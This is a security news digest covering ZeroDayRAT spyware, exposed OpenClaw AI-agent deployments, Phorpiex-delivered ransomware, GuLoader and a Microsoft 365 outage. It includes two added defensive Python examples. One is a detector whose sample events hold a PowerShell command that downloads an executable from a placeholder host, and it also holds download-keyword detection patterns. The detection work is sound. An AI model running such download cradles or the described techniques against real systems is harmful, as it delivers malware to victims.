ZeroDayRAT Mobile Spyware Enables Cross-Platform Surveillance and Financial Theft
Security researchers at iVerify have identified a commercial mobile spyware platform, ZeroDayRAT, openly sold on Telegram, offering full remote control over compromised Android and iOS devices. The platform supports a wide range of operating system versions and is marketed through dedicated sales and support channels, lowering the barrier to entry for cybercriminal buyers. Initial infection typically occurs through smishing links, phishing emails, or fake app downloads that trick victims into installing malicious payloads disguised as legitimate applications. Once installed, the spyware collects detailed device and user data, including SMS messages, app activity, notifications, account information, and GPS location history. The operator dashboard provides real-time visibility into victim behavior, allowing attackers to profile targets and monitor communications without opening individual applications. This level of access enables attackers to bypass SMS-based two-factor authentication and conduct targeted social engineering or account takeover attempts. Beyond passive data collection, ZeroDayRAT includes active surveillance and financial-theft capabilities, significantly increasing its impact. The malware can activate cameras and microphones, record screens, capture keystrokes, and track victims in real time, effectively turning the infected device into a remote surveillance platform. Dedicated modules target banking and cryptocurrency applications, capturing credentials, intercepting one-time passwords, and injecting addresses into the clipboard to redirect digital asset transfers. The cross-platform design and browser-based control panel allow attackers to manage victims globally with minimal technical expertise. Organizations and individuals should restrict installations to official app stores, enable advanced mobile security protections, and deploy mobile threat-detection tools to identify and block unauthorized applications.
Update: Misconfigured OpenClaw Deployments Leave Thousands of AI Agents Open to Takeover
SecurityScorecard’s STRIKE team has identified tens of thousands of internet-exposed OpenClaw (formerly Moltbot and Clawdbot) instances, many of which are running vulnerable versions with full system access. Internet-wide reconnaissance uncovered more than 42,000 exposed control panels across 82 countries, with roughly 15,000 instances vulnerable to remote code execution. The primary issue stems from insecure default configurations, as OpenClaw binds to all network interfaces by default, leaving management panels accessible from the public internet. Many deployments also expose weak authentication, leaked credentials, and unpatched software, creating an easily exploitable attack surface. Researchers observed that a significant portion of exposed instances were correlated with prior breach activity or associated with infrastructure previously linked to known threat actors. The findings indicate that the core risk is not speculative AI autonomy, but poorly secured automation platforms with privileged access to user systems and data. Once compromised, an OpenClaw instance can grant attackers the same permissions as the AI agent, including filesystem access, stored credentials, messaging integrations, and automated actions across connected services. The exposure is compounded by widespread version fragmentation, with most instances running outdated builds that predate critical security patches. Because these agents often operate with privileged identities, compromise enables attackers to impersonate users, access sensitive data, and automate malicious actions at machine speed. The campaign underscores how agentic AI platforms inherit traditional web-application risks but amplify their impact through automation and delegated authority. 
Organizations should restrict agent interfaces to localhost or VPN-protected networks, enforce strong authentication, patch vulnerable versions, and treat AI agents as privileged systems subject to the same security controls as administrative infrastructure.
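As an added illustration of the exposure check the STRIKE findings imply (not code from SecurityScorecard or the OpenClaw project), this Python audit parses `ss -lntp`-style listener output and flags any management panel bound to every interface rather than to loopback or a VPN address; the sample lines, process name and port numbers are constructed assumptions, not OpenClaw's actual defaults.

```python
"""Audit listening sockets for management panels exposed on all interfaces.

Added example, not from the SecurityScorecard report or the OpenClaw project.
Input is the `ss -H -lntp` layout; the sample lines, process name and port
numbers below are constructed assumptions, not OpenClaw's actual defaults.
"""
import ipaddress
import re

# Constructed sample: State Recv-Q Send-Q Local:Port Peer:Port Process.
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 127.0.0.1:18789 0.0.0.0:* users:(("agent",pid=4242,fd=5))
LISTEN 0 128 0.0.0.0:18790 0.0.0.0:* users:(("agent",pid=4243,fd=6))
LISTEN 0 128 [::]:18791 [::]:* users:(("agent",pid=4244,fd=7))
LISTEN 0 128 *:18792 *:* users:(("agent",pid=4245,fd=8))
LISTEN 0 128 10.8.0.2:18793 0.0.0.0:* users:(("agent",pid=4246,fd=9))
LISTEN 0 128 [::1]:18794 [::]:* users:(("agent",pid=4247,fd=10))
"""

# Local-address field: either "[v6]:port" or "v4-or-star:port".
_ADDR_RE = re.compile(r"^(?:\[(?P<v6>[^\]]+)\]|(?P<v4>[^:]+)):(?P<port>\d+)$")


def classify_bind(local):
    """Return 'loopback', 'wildcard' or 'specific' for an ss local-address field."""
    m = _ADDR_RE.match(local)
    if not m:
        raise ValueError(f"unrecognised local address: {local!r}")
    host = m.group("v6") or m.group("v4")
    if host == "*":                      # ss prints '*' for an unspecified IPv6 bind
        return "wildcard"
    ip = ipaddress.ip_address(host)
    if ip.is_loopback:                   # 127.0.0.0/8 or ::1: reachable only locally
        return "loopback"
    if ip.is_unspecified:                # 0.0.0.0 or ::: every interface, public included
        return "wildcard"
    return "specific"                    # e.g. a VPN tunnel address such as 10.8.0.2


def exposed_listeners(ss_output):
    """Return (host, port, process) triples for listeners bound to every interface."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        local = fields[3]
        if classify_bind(local) != "wildcard":
            continue
        m = _ADDR_RE.match(local)
        proc = fields[5] if len(fields) > 5 else "?"
        findings.append((m.group("v6") or m.group("v4"), int(m.group("port")), proc))
    return findings
```

Feeding it the live output of `ss -H -lntp` on an agent host lists exactly the panels that need rebinding to 127.0.0.1 or a VPN interface.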
Phorpiex Phishing Campaign Uses LNK Files to Deploy Offline GLOBAL GROUP Ransomware
Security researchers at Forcepoint have observed a high-volume phishing campaign leveraging the Phorpiex botnet to deliver GLOBAL GROUP ransomware through weaponized Windows shortcut ([.]lnk) attachments. The emails, typically themed “Your Document,” use hidden file extensions and legitimate icons to appear as harmless Word documents. When executed, the shortcut silently launches cmd[.]exe, which in turn uses PowerShell to download a secondary payload from a remote server. The downloaded binary, often disguised with a system-like name such as windrv[.]exe, initiates the ransomware execution chain using Living-off-the-Land techniques to minimize visible activity. Phorpiex, a long-standing malware-as-a-service botnet, is commonly used as an initial access vector for secondary payloads, including ransomware and information stealers. The deployed GLOBAL GROUP ransomware operates in a fully “mute” mode, generating its encryption key locally without contacting command-and-control infrastructure, allowing it to function even in offline or air-gapped environments. The malware includes anti-analysis checks, deletes shadow copies, terminates database and analysis processes, and removes its own binary after execution to reduce forensic artifacts. It also supports lateral movement through Active Directory enumeration and service creation on remote systems. Files are encrypted using the ChaCha20-Poly1305 algorithm and appended with the [.]Reco extension, while ransom notes are dropped across the system. This campaign demonstrates how simple phishing techniques combined with trusted system utilities can enable low-noise, high-impact ransomware delivery. Organizations should block or quarantine executable attachments such as [.]lnk files, restrict PowerShell abuse, and prioritize behavior-based endpoint detection to identify and stop ransomware activity before encryption completes.
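One way to turn the described chain into detection logic, as an added example that is not Forcepoint's content: the Python below scans constructed process-creation events for a user-facing launcher spawning cmd.exe, which in turn spawns PowerShell with download keywords, and surfaces the system-looking binary written outside C:\Windows; the field names, launcher set and keyword patterns are assumptions.

```python
"""Flag the cmd.exe -> PowerShell download chain Forcepoint describes for Phorpiex.
Added example, not Forcepoint's detection content. EVENTS are constructed process-
creation records in a simplified Sysmon-like shape; field names, the launcher set
and the keyword patterns are assumptions made for illustration."""
import re

# Constructed sample: pids 1-3 form the campaign-style chain, pids 4-5 are benign.
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -c <cradle>"},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('hxxp://placeholder.invalid/p','C:\Users\Public\windrv.exe')"'''},
    {"pid": 4, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"pid": 5, "ppid": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Process"},
]

USER_LAUNCHERS = {"explorer.exe", "outlook.exe"}  # assumed user-facing parents of the LNK target
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
STEALTH_RE = re.compile(r"-w(indowstyle)?\s+hidden|\s-nop\b|\s-e(nc|ncodedcommand)?\s", re.I)
OUTFILE_RE = re.compile(r"([A-Za-z]:\\[^'\"\s]+\.exe)", re.I)  # first .exe path on the command line

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()  # lower-cased file name of a Windows image path

def find_chains(events):
    """One finding per powershell.exe whose ancestry is launcher -> cmd.exe and which downloads."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if _name(ev["image"]) != "powershell.exe" or not DOWNLOAD_RE.search(ev["cmdline"]):
            continue
        parent = by_pid.get(ev["ppid"])
        if parent is None or _name(parent["image"]) != "cmd.exe":
            continue
        launcher = by_pid.get(parent["ppid"])
        if launcher is None or _name(launcher["image"]) not in USER_LAUNCHERS:
            continue
        m = OUTFILE_RE.search(ev["cmdline"])
        dropped = m.group(1) if m else None
        findings.append({
            "pid": ev["pid"],
            "launcher": _name(launcher["image"]),
            "hidden": bool(STEALTH_RE.search(ev["cmdline"])),
            "dropped": dropped,
            # the campaign writes a system-looking name outside C:\Windows; surface that tell
            "user_writable": dropped is not None and not dropped.lower().startswith("c:\\windows\\"),
        })
    return findings
```

Pid 5 is PowerShell under cmd.exe too, but without a download keyword it is not reported, which keeps ordinary administrative use out of the alert.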
GuLoader Uses Polymorphic Obfuscation and Cloud Services to Deliver Secondary Malware
Zscaler ThreatLabz reports that GuLoader, also known as CloudEye, continues to evolve as a highly obfuscated malware downloader used to deploy information stealers and remote access trojans. Active since at least 2019, the malware relies heavily on legitimate cloud services such as Google Drive and Microsoft OneDrive to host its payloads, allowing it to blend into normal network traffic and bypass reputation-based security controls. Recent variants use polymorphic code that dynamically constructs constants and strings at runtime, making static signatures unreliable and complicating analysis. GuLoader also implements exception-based control flow obfuscation, intentionally triggering CPU exceptions and using custom handlers to redirect execution, which makes automated tracing and debugging significantly more difficult. Over successive versions, the malware has expanded its use of exception types, including single-step, access violation, and illegal-instruction faults, increasing its complexity and resilience against analysis. These techniques collectively enable GuLoader to remain a persistent delivery mechanism for secondary malware families across enterprise environments. Once executed, the downloader retrieves encrypted payloads from these legitimate services and decrypts them in memory, minimizing on-disk artifacts and hindering traditional defenses. GuLoader also protects command-and-control URLs and internal data using XOR-based encryption and polymorphic string construction, making static analysis difficult. The malware’s continued development suggests active maintenance and a long-term role as a commodity delivery platform for multiple threat actors. Its combination of cloud-hosted payloads and advanced anti-analysis techniques allows it to bypass many signature-based and reputation-driven security tools. 
Organizations should strengthen outbound traffic monitoring, implement behavior-based detection, and restrict unsanctioned access to cloud services to reduce the risk of downloader-based intrusions.
Microsoft 365 Admin Center Outage Impacts North American Enterprise Tenants
On the morning of February 10, 2026, Microsoft acknowledged an active service incident affecting the Microsoft 365 admin center for some business and enterprise customers in North America. Initial telemetry indicated that administrators in the United States and Canada were unable to access the admin portal, while those who could log in experienced degraded functionality. Reports from outage-tracking platforms showed thousands of affected users, with symptoms including connection failures, slow response times, and inaccessible administrative features. Microsoft later confirmed that the disruption also affected the Microsoft 365 application, limiting administrators’ ability to manage tenants or submit support tickets. The company classified the event as a service incident, indicating noticeable user impact across affected regions. As of the latest update, Microsoft stated it was actively analyzing diagnostic telemetry from the admin center infrastructure, with a focus on CPU utilization patterns and user-provided HTTP Archive (HAR) files. The issue remains under investigation, with the scope currently limited to North American tenants, though the full impact has not been disclosed. The next official update is scheduled for 5:30 PM UTC on February 10, 2026, as Microsoft works to isolate the root cause and implement remediation. Organizations relying on the admin center for identity, licensing, and security configuration should prepare for temporary management disruptions until service stability is restored. Administrators should monitor the Microsoft 365 service health dashboard for updates and ensure alternate support and change-management procedures are available during the outage window. This is a developing story.